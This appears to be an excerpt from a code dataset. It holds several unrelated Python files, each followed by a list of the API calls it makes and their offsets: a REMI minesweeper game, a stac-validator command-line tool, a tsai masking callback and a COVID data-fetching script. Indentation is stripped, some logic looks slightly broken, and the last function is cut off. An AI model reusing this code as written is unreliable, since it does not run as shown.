self.style['background-image'] = "''"
if self.opened:
if self.has_mine:
self.style['background-image'] = "url('/my_resources:mine.png')"
else:
if self.nearest_mine > 0:
self.set_text(str(self.nearest_mine))
else:
self.style['background-color'] = 'rgb(200,255,100)'
return
if self.state == 2:
self.style['background-image'] = "url('/my_resources:doubt.png')"
if self.state == 1:
self.style['background-image'] = "url('/my_resources:flag.png')"
def add_nearest_mine(self):
self.nearest_mine += 1
class MyApp(App):
def __init__(self, *args):
res_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'res')
super(MyApp, self).__init__(*args, static_file_path={'my_resources': res_path})
def display_time(self):
self.lblTime.set_text('Play time: ' + str(self.time_count))
self.time_count += 1
if not self.stop_flag:
threading.Timer(1, self.display_time).start()
def main(self):
# the arguments are width - height - layoutOrientationOrizontal
self.main_container = gui.Container(margin='0px auto')
self.main_container.set_size(1020, 600)
self.main_container.set_layout_orientation(gui.Container.LAYOUT_VERTICAL)
self.title = gui.Label('Mine Field GAME')
self.title.set_size(1000, 30)
self.title.style['margin'] = '10px'
self.title.style['font-size'] = '25px'
self.title.style['font-weight'] = 'bold'
self.info = gui.Label('Collaborative minefiled game. Enjoy.')
self.info.set_size(400, 30)
self.info.style['margin'] = '10px'
self.info.style['font-size'] = '20px'
self.lblMineCount = gui.Label('Mines')
self.lblMineCount.set_size(100, 30)
self.lblFlagCount = gui.Label('Flags')
self.lblFlagCount.set_size(100, 30)
self.time_count = 0
self.lblTime = gui.Label('Time')
self.lblTime.set_size(100, 30)
self.btReset = gui.Button('Restart')
self.btReset.set_size(100, 30)
self.btReset.onclick.do(self.new_game)
self.horizontal_container = gui.Container()
self.horizontal_container.style['display'] = 'block'
self.horizontal_container.style['overflow'] = 'auto'
self.horizontal_container.set_layout_orientation(gui.Container.LAYOUT_HORIZONTAL)
self.horizontal_container.style['margin'] = '10px'
self.horizontal_container.append(self.info)
imgMine = gui.Image('/my_resources:mine.png')
imgMine.set_size(30, 30)
self.horizontal_container.append([imgMine, self.lblMineCount])
imgFlag = gui.Image('/my_resources:flag.png')
imgFlag.set_size(30, 30)
self.horizontal_container.append([imgFlag, self.lblFlagCount, self.lblTime, self.btReset])
self.minecount = 0 # mine number in the map
self.flagcount = 0 # flag placed by the players
self.link = gui.Link("https://github.com/rawpython/remi",
"This is an example of REMI gui library.")
self.link.set_size(1000, 20)
self.link.style['margin'] = '10px'
self.main_container.append([self.title, self.horizontal_container, self.link])
self.new_game(self)
self.stop_flag = False
self.display_time()
# returning the root widget
return self.main_container
def on_close(self):
self.stop_flag = True
super(MyApp, self).on_close()
def coord_in_map(self, x, y, w=None, h=None):
w = len(self.mine_matrix[0]) if w is None else w
h = len(self.mine_matrix) if h is None else h
return not (x > w - 1 or y > h - 1 or x < 0 or y < 0)
def new_game(self, widget):
self.time_count = 0
self.mine_table = gui.Table(margin='0px auto') # 900, 450
self.mine_matrix = self.build_mine_matrix(8, 8, 5)
self.mine_table.empty()
for x in range(0, len(self.mine_matrix[0])):
row = gui.TableRow()
for y in range(0, len(self.mine_matrix)):
row.append(self.mine_matrix[y][x])
self.mine_matrix[y][x].onclick.do(self.mine_matrix[y][x].check_mine)
self.mine_table.append(row)
# self.mine_table.append_from_list(self.mine_matrix, False)
self.main_container.append(self.mine_table, key="mine_table")
self.check_if_win()
self.set_root_widget(self.main_container)
def build_mine_matrix(self, w, h, minenum):
"""random fill cells with mines and increments nearest mines num in adiacent cells"""
self.minecount = 0
matrix = [[Cell(30, 30, x, y, self) for x in range(w)] for y in range(h)]
for i in range(0, minenum):
x = random.randint(0, w - 1)
y = random.randint(0, h - 1)
if matrix[y][x].has_mine:
continue
self.minecount += 1
matrix[y][x].has_mine = True
for coord in [[-1, -1], [-1, 0], [-1, 1], [0, -1], [0, 1], [1, -1], [1, 0], [1, 1]]:
_x, _y = coord
if not self.coord_in_map(x + _x, y + _y, w, h):
continue
matrix[y + _y][x + _x].add_nearest_mine()
return matrix
def no_mine(self, cell):
"""opens nearest cells that are not near a mine"""
if cell.nearest_mine > 0:
return
self.fill_void_cells(cell)
def check_if_win(self):
"""Here are counted the flags. Is checked if the user win."""
self.flagcount = 0
win = True
for x in range(0, len(self.mine_matrix[0])):
for y in range(0, len(self.mine_matrix)):
if self.mine_matrix[y][x].state == 1:
self.flagcount += 1
if not self.mine_matrix[y][x].has_mine:
win = False
elif self.mine_matrix[y][x].has_mine:
win = False
self.lblMineCount.set_text("%s" % self.minecount)
self.lblFlagCount.set_text("%s" % self.flagcount)
if win:
self.dialog = gui.GenericDialog(title='You Win!', message='Game done in %s seconds' % self.time_count)
self.dialog.confirm_dialog.do(self.new_game)
self.dialog.cancel_dialog.do(self.new_game)
self.dialog.show(self)
def fill_void_cells(self, cell):
checked_cells = [cell, ]
while len(checked_cells) > 0:
for cell in checked_cells[:]:
checked_cells.remove(cell)
if (not self.mine_matrix[cell.y][cell.x].has_mine) and \
(self.mine_matrix[cell.y][cell.x].nearest_mine == 0):
for coord in [[-1, -1], [-1, 0], [-1, 1], [0, -1], [0, 1], [1, -1], [1, 0], [1, 1]]:
_x, _y = coord
if not self.coord_in_map(cell.x + _x, cell.y + _y):
continue
if not self.mine_matrix[cell.y + _y][cell.x + _x].opened:
self.mine_matrix[cell.y + _y][cell.x + _x].check_mine(None, False)
checked_cells.append(self.mine_matrix[cell.y + _y][cell.x + _x])
def explosion(self, cell):
print("explosion")
self.mine_table = gui.Table(margin='0px auto')
self.main_container.append(self.mine_table, key="mine_table")
for x in range(0, len(self.mine_matrix[0])):
for y in range(0, len(self.mine_matrix)):
self.mine_matrix[y][x].style['background-color'] = 'red'
self.mine_matrix[y][x].check_mine(None, False)
self.mine_table.empty()
# self.mine_table.append_from_list(self.mine_matrix, False)
for x in range(0, len(self.mine_matrix[0])):
row = gui.TableRow()
for y in range(0, len(self.mine_matrix)):
row.append(self.mine_matrix[y][x])
self.mine_matrix[y][x].onclick.do(self.mine_matrix[y][x].check_mine)
self.mine_table.append(row)
if __name__ == "__main__":
start(MyApp, multiple_instance=True, address='0.0.0.0', port=0, debug=True, start_browser=True)
|
[
"remi.gui.Container",
"threading.Timer",
"random.randint",
"remi.gui.GenericDialog",
"remi.gui.TableRow",
"remi.gui.Table",
"remi.gui.Image",
"remi.gui.Link",
"remi.start",
"remi.gui.Button",
"remi.gui.Label"
] |
[((10512, 10611), 'remi.start', 'start', (['MyApp'], {'multiple_instance': '(True)', 'address': '"""0.0.0.0"""', 'port': '(0)', 'debug': '(True)', 'start_browser': '(True)'}), "(MyApp, multiple_instance=True, address='0.0.0.0', port=0, debug=True,\n start_browser=True)\n", (10517, 10611), False, 'from remi import start, App\n'), ((3474, 3506), 'remi.gui.Container', 'gui.Container', ([], {'margin': '"""0px auto"""'}), "(margin='0px auto')\n", (3487, 3506), True, 'import remi.gui as gui\n'), ((3659, 3687), 'remi.gui.Label', 'gui.Label', (['"""Mine Field GAME"""'], {}), "('Mine Field GAME')\n", (3668, 3687), True, 'import remi.gui as gui\n'), ((3887, 3936), 'remi.gui.Label', 'gui.Label', (['"""Collaborative minefiled game. Enjoy."""'], {}), "('Collaborative minefiled game. Enjoy.')\n", (3896, 3936), True, 'import remi.gui as gui\n'), ((4091, 4109), 'remi.gui.Label', 'gui.Label', (['"""Mines"""'], {}), "('Mines')\n", (4100, 4109), True, 'import remi.gui as gui\n'), ((4182, 4200), 'remi.gui.Label', 'gui.Label', (['"""Flags"""'], {}), "('Flags')\n", (4191, 4200), True, 'import remi.gui as gui\n'), ((4297, 4314), 'remi.gui.Label', 'gui.Label', (['"""Time"""'], {}), "('Time')\n", (4306, 4314), True, 'import remi.gui as gui\n'), ((4378, 4399), 'remi.gui.Button', 'gui.Button', (['"""Restart"""'], {}), "('Restart')\n", (4388, 4399), True, 'import remi.gui as gui\n'), ((4523, 4538), 'remi.gui.Container', 'gui.Container', ([], {}), '()\n', (4536, 4538), True, 'import remi.gui as gui\n'), ((4880, 4915), 'remi.gui.Image', 'gui.Image', (['"""/my_resources:mine.png"""'], {}), "('/my_resources:mine.png')\n", (4889, 4915), True, 'import remi.gui as gui\n'), ((5038, 5073), 'remi.gui.Image', 'gui.Image', (['"""/my_resources:flag.png"""'], {}), "('/my_resources:flag.png')\n", (5047, 5073), True, 'import remi.gui as gui\n'), ((5338, 5430), 'remi.gui.Link', 'gui.Link', (['"""https://github.com/rawpython/remi"""', '"""This is an example of REMI gui library."""'], {}), "('https://github.com/rawpython/remi',\n 'This is an example of REMI gui library.')\n", (5346, 5430), True, 'import remi.gui as gui\n'), ((6188, 6216), 'remi.gui.Table', 'gui.Table', ([], {'margin': '"""0px auto"""'}), "(margin='0px auto')\n", (6197, 6216), True, 'import remi.gui as gui\n'), ((9720, 9748), 'remi.gui.Table', 'gui.Table', ([], {'margin': '"""0px auto"""'}), "(margin='0px auto')\n", (9729, 9748), True, 'import remi.gui as gui\n'), ((6392, 6406), 'remi.gui.TableRow', 'gui.TableRow', ([], {}), '()\n', (6404, 6406), True, 'import remi.gui as gui\n'), ((7158, 7182), 'random.randint', 'random.randint', (['(0)', '(w - 1)'], {}), '(0, w - 1)\n', (7172, 7182), False, 'import random\n'), ((7199, 7223), 'random.randint', 'random.randint', (['(0)', '(h - 1)'], {}), '(0, h - 1)\n', (7213, 7223), False, 'import random\n'), ((8525, 8617), 'remi.gui.GenericDialog', 'gui.GenericDialog', ([], {'title': '"""You Win!"""', 'message': "('Game done in %s seconds' % self.time_count)"}), "(title='You Win!', message='Game done in %s seconds' %\n self.time_count)\n", (8542, 8617), True, 'import remi.gui as gui\n'), ((10234, 10248), 'remi.gui.TableRow', 'gui.TableRow', ([], {}), '()\n', (10246, 10248), True, 'import remi.gui as gui\n'), ((3302, 3339), 'threading.Timer', 'threading.Timer', (['(1)', 'self.display_time'], {}), '(1, self.display_time)\n', (3317, 3339), False, 'import threading\n')]
|
import json
import sys
import click # type: ignore
from stac_check.cli import cli_message as lint_message # type: ignore
from stac_check.lint import Linter # type: ignore
from .validate import StacValidate
@click.command()
@click.argument("stac_file")
@click.option(
"--lint",
is_flag=True,
help="Use stac-check to lint the stac object in addition to validating it.",
)
@click.option(
"--core", is_flag=True, help="Validate core stac object only without extensions."
)
@click.option("--extensions", is_flag=True, help="Validate extensions only.")
@click.option(
"--links",
is_flag=True,
help="Additionally validate links. Only works with default mode.",
)
@click.option(
"--assets",
is_flag=True,
help="Additionally validate assets. Only works with default mode.",
)
@click.option(
"--custom",
"-c",
default="",
help="Validate against a custom schema (local filepath or remote schema).",
)
@click.option(
"--recursive",
"-r",
is_flag=True,
help="Recursively validate all related stac objects.",
)
@click.option(
"--max-depth",
"-m",
type=int,
help="Maximum depth to traverse when recursing. Omit this argument to get full recursion. Ignored if `recursive == False`.",
)
@click.option(
"-v", "--verbose", is_flag=True, help="Enables verbose output for recursive mode."
)
@click.option("--no_output", is_flag=True, help="Do not print output to console.")
@click.option(
"--log_file",
default="",
help="Save full recursive output to log file (local filepath).",
)
@click.version_option(version="3.0.0")
def main(
stac_file,
lint,
recursive,
max_depth,
core,
extensions,
links,
assets,
custom,
verbose,
no_output,
log_file,
):
valid = True
if lint is True:
linter = Linter(stac_file, assets=True, links=True, recursive=False)
lint_message(linter)
else:
stac = StacValidate(
stac_file=stac_file,
recursive=recursive,
max_depth=max_depth,
core=core,
links=links,
assets=assets,
extensions=extensions,
custom=custom,
verbose=verbose,
no_output=no_output,
log=log_file,
)
valid = stac.run()
if no_output is False:
click.echo(json.dumps(stac.message, indent=4))
sys.exit(0 if valid else 1)
if __name__ == "__main__":
main()
|
[
"click.version_option",
"click.argument",
"click.option",
"stac_check.lint.Linter",
"json.dumps",
"click.command",
"stac_check.cli.cli_message",
"sys.exit"
] |
[((214, 229), 'click.command', 'click.command', ([], {}), '()\n', (227, 229), False, 'import click\n'), ((231, 258), 'click.argument', 'click.argument', (['"""stac_file"""'], {}), "('stac_file')\n", (245, 258), False, 'import click\n'), ((260, 378), 'click.option', 'click.option', (['"""--lint"""'], {'is_flag': '(True)', 'help': '"""Use stac-check to lint the stac object in addition to validating it."""'}), "('--lint', is_flag=True, help=\n 'Use stac-check to lint the stac object in addition to validating it.')\n", (272, 378), False, 'import click\n'), ((390, 490), 'click.option', 'click.option', (['"""--core"""'], {'is_flag': '(True)', 'help': '"""Validate core stac object only without extensions."""'}), "('--core', is_flag=True, help=\n 'Validate core stac object only without extensions.')\n", (402, 490), False, 'import click\n'), ((493, 569), 'click.option', 'click.option', (['"""--extensions"""'], {'is_flag': '(True)', 'help': '"""Validate extensions only."""'}), "('--extensions', is_flag=True, help='Validate extensions only.')\n", (505, 569), False, 'import click\n'), ((571, 680), 'click.option', 'click.option', (['"""--links"""'], {'is_flag': '(True)', 'help': '"""Additionally validate links. Only works with default mode."""'}), "('--links', is_flag=True, help=\n 'Additionally validate links. Only works with default mode.')\n", (583, 680), False, 'import click\n'), ((692, 803), 'click.option', 'click.option', (['"""--assets"""'], {'is_flag': '(True)', 'help': '"""Additionally validate assets. Only works with default mode."""'}), "('--assets', is_flag=True, help=\n 'Additionally validate assets. Only works with default mode.')\n", (704, 803), False, 'import click\n'), ((815, 938), 'click.option', 'click.option', (['"""--custom"""', '"""-c"""'], {'default': '""""""', 'help': '"""Validate against a custom schema (local filepath or remote schema)."""'}), "('--custom', '-c', default='', help=\n 'Validate against a custom schema (local filepath or remote schema).')\n", (827, 938), False, 'import click\n'), ((954, 1061), 'click.option', 'click.option', (['"""--recursive"""', '"""-r"""'], {'is_flag': '(True)', 'help': '"""Recursively validate all related stac objects."""'}), "('--recursive', '-r', is_flag=True, help=\n 'Recursively validate all related stac objects.')\n", (966, 1061), False, 'import click\n'), ((1077, 1255), 'click.option', 'click.option', (['"""--max-depth"""', '"""-m"""'], {'type': 'int', 'help': '"""Maximum depth to traverse when recursing. Omit this argument to get full recursion. Ignored if `recursive == False`."""'}), "('--max-depth', '-m', type=int, help=\n 'Maximum depth to traverse when recursing. Omit this argument to get full recursion. Ignored if `recursive == False`.'\n )\n", (1089, 1255), False, 'import click\n'), ((1266, 1367), 'click.option', 'click.option', (['"""-v"""', '"""--verbose"""'], {'is_flag': '(True)', 'help': '"""Enables verbose output for recursive mode."""'}), "('-v', '--verbose', is_flag=True, help=\n 'Enables verbose output for recursive mode.')\n", (1278, 1367), False, 'import click\n'), ((1370, 1456), 'click.option', 'click.option', (['"""--no_output"""'], {'is_flag': '(True)', 'help': '"""Do not print output to console."""'}), "('--no_output', is_flag=True, help=\n 'Do not print output to console.')\n", (1382, 1456), False, 'import click\n'), ((1453, 1561), 'click.option', 'click.option', (['"""--log_file"""'], {'default': '""""""', 'help': '"""Save full recursive output to log file (local filepath)."""'}), "('--log_file', default='', help=\n 'Save full recursive output to log file (local filepath).')\n", (1465, 1561), False, 'import click\n'), ((1573, 1610), 'click.version_option', 'click.version_option', ([], {'version': '"""3.0.0"""'}), "(version='3.0.0')\n", (1593, 1610), False, 'import click\n'), ((2423, 2450), 'sys.exit', 'sys.exit', (['(0 if valid else 1)'], {}), '(0 if valid else 1)\n', (2431, 2450), False, 'import sys\n'), ((1838, 1897), 'stac_check.lint.Linter', 'Linter', (['stac_file'], {'assets': '(True)', 'links': '(True)', 'recursive': '(False)'}), '(stac_file, assets=True, links=True, recursive=False)\n', (1844, 1897), False, 'from stac_check.lint import Linter\n'), ((1906, 1926), 'stac_check.cli.cli_message', 'lint_message', (['linter'], {}), '(linter)\n', (1918, 1926), True, 'from stac_check.cli import cli_message as lint_message\n'), ((2382, 2416), 'json.dumps', 'json.dumps', (['stac.message'], {'indent': '(4)'}), '(stac.message, indent=4)\n', (2392, 2416), False, 'import json\n')]
|
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/063_callback.MVP.ipynb (unless otherwise specified).
__all__ = ['create_subsequence_mask', 'create_variable_mask', 'create_future_mask', 'natural_mask', 'create_mask',
'MVP', 'TSBERT']
# Cell
from ..imports import *
from fastai.callback.all import *
from ..utils import *
from ..models.utils import *
from ..models.layers import *
# Cell
from torch.distributions.beta import Beta
# Cell
from torch.distributions.geometric import Geometric
from torch.distributions.binomial import Binomial
def create_subsequence_mask(o, r=.15, lm=3, stateful=True, sync=False):
if r <= 0: return torch.zeros_like(o).bool()
device = o.device
if o.ndim == 2: o = o[None]
n_masks, mask_dims, mask_len = o.shape
if sync == 'random': sync = random.random() > .5
dims = 1 if sync else mask_dims
if stateful:
numels = n_masks * dims * mask_len
pm = torch.tensor([1 / lm], device=device)
pu = torch.clip(pm * (r / max(1e-6, 1 - r)), 1e-3, 1)
zot, proba_a, proba_b = (torch.as_tensor([False, True], device=device), pu, pm) if random.random() > pm else \
(torch.as_tensor([True, False], device=device), pm, pu)
max_len = max(1, 2 * math.ceil(numels // (1/pm + 1/pu)))
for i in range(10):
_dist_a = (Geometric(probs=proba_a).sample([max_len])+1).long()
_dist_b = (Geometric(probs=proba_b).sample([max_len])+1).long()
dist_a = _dist_a if i == 0 else torch.cat((dist_a, _dist_a), dim=0)
dist_b = _dist_b if i == 0 else torch.cat((dist_b, _dist_b), dim=0)
add = torch.add(dist_a, dist_b)
if torch.gt(torch.sum(add), numels): break
dist_len = torch.argmax((torch.cumsum(add, 0) >= numels).float()) + 1
if dist_len%2: dist_len += 1
repeats = torch.cat((dist_a[:dist_len], dist_b[:dist_len]), -1).flatten()
zot = zot.repeat(dist_len)
mask = torch.repeat_interleave(zot, repeats)[:numels].reshape(n_masks, dims, mask_len)
else:
probs = torch.tensor(r, device=device)
mask = Binomial(1, probs).sample((n_masks, dims, mask_len)).bool()
if sync: mask = mask.repeat(1, mask_dims, 1)
return mask
def create_variable_mask(o, r=.15):
if r <= 0: return torch.zeros_like(o).bool()
device = o.device
n_masks, mask_dims, mask_len = o.shape
_mask = torch.zeros((n_masks * mask_dims, mask_len), device=device)
if int(mask_dims * r) > 0:
n_masked_vars = int(n_masks * mask_dims * r)
p = torch.tensor([1./(n_masks * mask_dims)], device=device).repeat([n_masks * mask_dims])
sel_dims = p.multinomial(num_samples=n_masked_vars, replacement=False)
_mask[sel_dims] = 1
mask = _mask.reshape(*o.shape).bool()
return mask
def create_future_mask(o, r=.15, sync=False):
if r <= 0: return torch.zeros_like(o).bool()
if o.ndim == 2: o = o[None]
n_masks, mask_dims, mask_len = o.shape
if sync == 'random': sync = random.random() > .5
dims = 1 if sync else mask_dims
probs = torch.tensor(r, device=o.device)
mask = Binomial(1, probs).sample((n_masks, dims, mask_len))
if sync: mask = mask.repeat(1, mask_dims, 1)
mask = torch.sort(mask,dim=-1, descending=False)[0].bool()
return mask
def natural_mask(o):
"""Applies natural missingness in a batch to non-nan values in the next sample"""
mask1 = torch.isnan(o)
mask2 = rotate_axis0(mask1)
return torch.logical_and(mask2, ~mask1)
# Cell
def create_mask(o, r=.15, lm=3, stateful=True, sync=False, subsequence_mask=True, variable_mask=False, future_mask=False):
if r <= 0 or r >=1: return torch.zeros_like(o).bool()
if int(r * o.shape[1]) == 0:
variable_mask = False
if subsequence_mask and variable_mask:
random_thr = 1/3 if sync == 'random' else 1/2
if random.random() > random_thr:
variable_mask = False
else:
subsequence_mask = False
elif future_mask:
return create_future_mask(o, r=r)
elif subsequence_mask:
return create_subsequence_mask(o, r=r, lm=lm, stateful=stateful, sync=sync)
elif variable_mask:
return create_variable_mask(o, r=r)
else:
raise ValueError('You need to set subsequence_mask, variable_mask or future_mask to True or pass a custom mask.')
# Cell
import matplotlib.colors as mcolors
class MVP(Callback):
order = 60
def __init__(self, r: float = .15, subsequence_mask: bool = True, lm: float = 3., stateful: bool = True, sync: bool = False, variable_mask: bool = False,
future_mask: bool = False, custom_mask: Optional = None, nan_to_num: int = 0, window_size: Optional[tuple] = None, dropout: float = .1,
crit: callable = None, weights_path: Optional[str] = None, target_dir: str = './data/MVP', fname: str = 'model', save_best: bool = True,
verbose: bool = False):
r"""
Callback used to perform the pretext task of reconstruct the original data after a binary mask has been applied.
Args:
r: proba of masking.
subsequence_mask: apply a mask to random subsequences.
lm: average mask len when using stateful (geometric) masking.
stateful: geometric distribution is applied so that average mask length is lm.
sync: all variables have the same masking.
variable_mask: apply a mask to random variables. Only applicable to multivariate time series.
future_mask: used to train a forecasting model.
custom_mask: allows to pass any type of mask with input tensor and output tensor. Values to mask should be set to True.
nan_to_num: integer used to fill masked values
window_size: allows you to pass a fixed window size or tuple of window sizes to train MVP with on sequences of different length.
You may pass int(s) or float(s).
dropout: dropout applied to the head of the model during pretraining.
crit: loss function that will be used. If None MSELossFlat().
weights_path: indicates the path to pretrained weights. This is useful when you want to continue training from a checkpoint. It will load the
pretrained weights to the model with the MVP head.
target_dir : directory where trained model will be stored.
fname : file name that will be used to save the pretrained model.
save_best: saves best model weights
"""
assert subsequence_mask or variable_mask or future_mask or custom_mask, \
'you must set (subsequence_mask and/or variable_mask) or future_mask to True or use a custom_mask'
if custom_mask is not None and (future_mask or subsequence_mask or variable_mask):
warnings.warn("Only custom_mask will be used")
elif future_mask and (subsequence_mask or variable_mask):
warnings.warn("Only future_mask will be used")
store_attr("subsequence_mask,variable_mask,future_mask,custom_mask,dropout,r,lm,stateful,sync,crit,weights_path,fname,save_best,verbose,nan_to_num")
self.PATH = Path(f'{target_dir}/{self.fname}')
if not os.path.exists(self.PATH.parent):
os.makedirs(self.PATH.parent)
self.path_text = f"pretrained weights_path='{self.PATH}.pth'"
self.window_size = window_size
def before_fit(self):
self.run = not hasattr(self, "gather_preds")
if 'SaveModelCallback' in [cb.__class__.__name__ for cb in self.learn.cbs]:
self.save_best = False # avoid saving if SaveModelCallback is being used
if not(self.run): return
# prepare to save best model
self.best = float('inf')
# modify loss for denoising task
self.old_loss_func = self.learn.loss_func
self.learn.loss_func = self._loss
if self.crit is None:
self.crit = MSELossFlat()
self.learn.MVP = self
self.learn.TSBERT = self
# remove and store metrics
self.learn.metrics = L([])
# change head with conv layer (equivalent to linear layer applied to dim=1)
assert hasattr(self.learn.model, "head"), "model must have a head attribute to be trained with MVP"
self.learn.model.head = nn.Sequential(nn.Dropout(self.dropout),
nn.Conv1d(self.learn.model.head_nf, self.learn.dls.vars, 1)
).to(self.learn.dls.device)
if self.weights_path is not None:
transfer_weights(learn.model, self.weights_path, device=self.learn.dls.device, exclude_head=False)
with torch.no_grad():
xb = torch.randn(2, self.learn.dls.vars, self.learn.dls.len).to(self.learn.dls.device)
assert xb.shape == self.learn.model(xb).shape, 'the model cannot reproduce the input shape'
if self.window_size:
if isinstance(self.window_size, float) or self.window_size == 1:
self.window_size = int(round(self.window_size * self.learn.dls.len))
elif is_listy(self.window_size):
self.window_size = list(self.window_size)
for i in range(len(self.window_size)):
if isinstance(self.window_size[i], float) or self.window_size[i] == 1:
self.window_size[i] = int(round(self.window_size[i] * self.learn.dls.len))
def before_batch(self):
original_mask = torch.isnan(self.x)
if self.custom_mask is not None:
new_mask = self.custom_mask(self.x)
else:
new_mask = create_mask(self.x, r=self.r, lm=self.lm, stateful=self.stateful, sync=self.sync, subsequence_mask=self.subsequence_mask,
variable_mask=self.variable_mask, future_mask=self.future_mask).bool()
if original_mask.any():
self.mask = torch.logical_and(new_mask, ~original_mask)
else:
self.mask = new_mask
# self.learn.yb = (torch.nan_to_num(self.x, self.nan_to_num),) # Only available in Pytorch 1.8
self.learn.yb = (torch_nan_to_num(self.x, self.nan_to_num),)
self.learn.xb = (self.yb[0].masked_fill(self.mask, self.nan_to_num), )
if self.window_size:
if is_listy(self.window_size): ws = np.random.randint(*self.window_size)
else: ws = self.window_size
w_start = np.random.randint(0, self.x.shape[-1] - ws)
self.learn.xb = (self.learn.xb[0][..., w_start:w_start+ws], )
self.learn.yb = (self.learn.yb[0][..., w_start:w_start+ws], )
self.mask = self.mask[..., w_start:w_start+ws]
def after_epoch(self):
val = self.learn.recorder.values[-1][-1]
if self.save_best:
if np.less(val, self.best):
self.best = val
self.best_epoch = self.epoch
torch.save(self.learn.model.state_dict(), f'{self.PATH}.pth')
pv(f"best epoch: {self.best_epoch:3} val_loss: {self.best:8.6f} - {self.path_text}", self.verbose or (self.epoch == self.n_epoch - 1))
elif self.epoch == self.n_epoch - 1:
print(f"\nepochs: {self.n_epoch} best epoch: {self.best_epoch:3} val_loss: {self.best:8.6f} - {self.path_text}\n")
def after_fit(self):
self.run = True
def _loss(self, preds, target):
return self.crit(preds[self.mask], target[self.mask])
def show_preds(self, max_n=9, nrows=3, ncols=3, figsize=None, sharex=True, **kwargs):
b = self.learn.dls.valid.one_batch()
self.learn._split(b)
self.learn('before_batch')
xb = self.xb[0].detach().cpu().numpy()
bs, nvars, seq_len = xb.shape
masked_pred = torch.where(self.mask, self.learn.model(*self.learn.xb), tensor([np.nan], device=self.learn.x.device))
masked_pred = masked_pred.detach().cpu().numpy()
ncols = min(ncols, math.ceil(bs / ncols))
nrows = min(nrows, math.ceil(bs / ncols))
max_n = min(max_n, bs, nrows*ncols)
if figsize is None:
figsize = (ncols*6, math.ceil(max_n/ncols)*4)
fig, ax = plt.subplots(nrows=nrows, ncols=ncols,
figsize=figsize, sharex=sharex, **kwargs)
idxs = np.random.permutation(np.arange(bs))
colors = list(mcolors.TABLEAU_COLORS.keys()) + \
random_shuffle(list(mcolors.CSS4_COLORS.keys()))
i = 0
for row in ax:
for col in row:
color_iter = iter(colors)
for j in range(nvars):
try:
color = next(color_iter)
except:
color_iter = iter(colors)
color = next(color_iter)
col.plot(xb[idxs[i]][j], alpha=.5, color=color)
col.plot(masked_pred[idxs[i]][j],
marker='o', markersize=4, linestyle='None', color=color)
i += 1
plt.tight_layout()
plt.show()
TSBERT = MVP
|
[
"torch.distributions.binomial.Binomial",
"matplotlib.colors.TABLEAU_COLORS.keys",
"torch.distributions.geometric.Geometric",
"matplotlib.colors.CSS4_COLORS.keys"
] |
[((3130, 3148), 'torch.distributions.binomial.Binomial', 'Binomial', (['(1)', 'probs'], {}), '(1, probs)\n', (3138, 3148), False, 'from torch.distributions.binomial import Binomial\n'), ((12583, 12612), 'matplotlib.colors.TABLEAU_COLORS.keys', 'mcolors.TABLEAU_COLORS.keys', ([], {}), '()\n', (12610, 12612), True, 'import matplotlib.colors as mcolors\n'), ((12650, 12676), 'matplotlib.colors.CSS4_COLORS.keys', 'mcolors.CSS4_COLORS.keys', ([], {}), '()\n', (12674, 12676), True, 'import matplotlib.colors as mcolors\n'), ((2119, 2137), 'torch.distributions.binomial.Binomial', 'Binomial', (['(1)', 'probs'], {}), '(1, probs)\n', (2127, 2137), False, 'from torch.distributions.binomial import Binomial\n'), ((1332, 1356), 'torch.distributions.geometric.Geometric', 'Geometric', ([], {'probs': 'proba_a'}), '(probs=proba_a)\n', (1341, 1356), False, 'from torch.distributions.geometric import Geometric\n'), ((1408, 1432), 'torch.distributions.geometric.Geometric', 'Geometric', ([], {'probs': 'proba_b'}), '(probs=proba_b)\n', (1417, 1432), False, 'from torch.distributions.geometric import Geometric\n')]
|
import pandas as pd
from sodapy import Socrata
import datetime
import definitions
# global variables for main data:
hhs_data, test_data, nyt_data_us, nyt_data_state, max_hosp_date = [],[],[],[],[]
"""
get_data()
Fetches data from API, filters, cleans, and combines with provisional.
After running, global variables are filled for use in subsequent functions
"""
def get_data():
global nyt_data_us
global nyt_data_state
global test_data
global hhs_data
global max_hosp_date
nyt_data_us = pd.read_csv("https://raw.githubusercontent.com/nytimes/covid-19-data/master/rolling-averages/us.csv")
nyt_data_state = pd.read_csv("https://raw.githubusercontent.com/nytimes/covid-19-data/master/rolling-averages/us-states.csv")
client = Socrata("healthdata.gov", None)
results = client.get("g62h-syeh", limit=2000000)
test_results = client.get("j8mb-icvb", limit=2000000)
print("LOG: Fetched all raw data")
# Filter data to get columns of interest
hhs_data = pd.DataFrame.from_records(results)[['state', 'date', 'inpatient_beds_used_covid']]
hhs_data.inpatient_beds_used_covid = hhs_data.inpatient_beds_used_covid.fillna(0)
hhs_data = hhs_data.astype({'inpatient_beds_used_covid': 'int32'})
test_data = pd.DataFrame.from_records(test_results)[['state', 'date', 'overall_outcome', 'new_results_reported']]
test_data.new_results_reported = test_data.new_results_reported.fillna(0)
test_data = test_data.astype({'new_results_reported': 'int32'})
print("LOG: Filtered Data")
# For provisional data, gets days since most recent update of HHS time series
max_date = hhs_data.date.max()
max_hosp_date = max_date
provisional = client.get("4cnb-m4rz", limit=2000000, where=f"update_date > '{max_date}'")
hhs_provisional = pd.DataFrame.from_records(provisional)[['update_date', 'archive_link']]
hhs_provisional.update_date = hhs_provisional.update_date.apply(lambda x: x[:10])
hhs_provisional.update_date = pd.to_datetime(hhs_provisional.update_date)
# Gets last archive of every day
group = hhs_provisional.groupby(['update_date'])
hhs_provisional = group.last()
# Add provisional data to HHS data
frames = []
for a in hhs_provisional.iterrows():
date = a[0]
url = a[1].item()['url']
df = pd.read_csv(url)[['state', 'inpatient_beds_used_covid']]
df['date']=date
if date > pd.Timestamp(max_date): # Avoids double counting if provisional update came after real update
frames.append(df)
frames.append(hhs_data)
hhs_data = (pd.concat(frames))
print("LOG: Added HHS Provisional data")
# Make date columns in proper format
# hhs_data.date = hhs_data.date.apply(lambda x: x[:10])
hhs_data.date= pd.to_datetime(hhs_data.date)
# hhs_data.to_csv("../data/hospitalizations.csv")
print("LOG: Wrote HHS data to CSV")
test_data.date = test_data.date.apply(lambda x: x[:10])
test_data.date = pd.to_datetime(test_data.date)
nyt_data_us.date = pd.to_datetime(nyt_data_us.date)
nyt_data_state.date = pd.to_datetime(nyt_data_state.date)
print("LOG: Done getting data")
"""
get_state_cases
Creates dataframe of time series date and cases for given state
inputs:
state_codes: List of 2-letter codes of states to query
start_date (pd.Timestamp): starting date, defaults to 1-1-2020
end_date (pd.Timestamp): ending date, defaults to today
returns:
df with 'date' and 'test_positivity'
"""
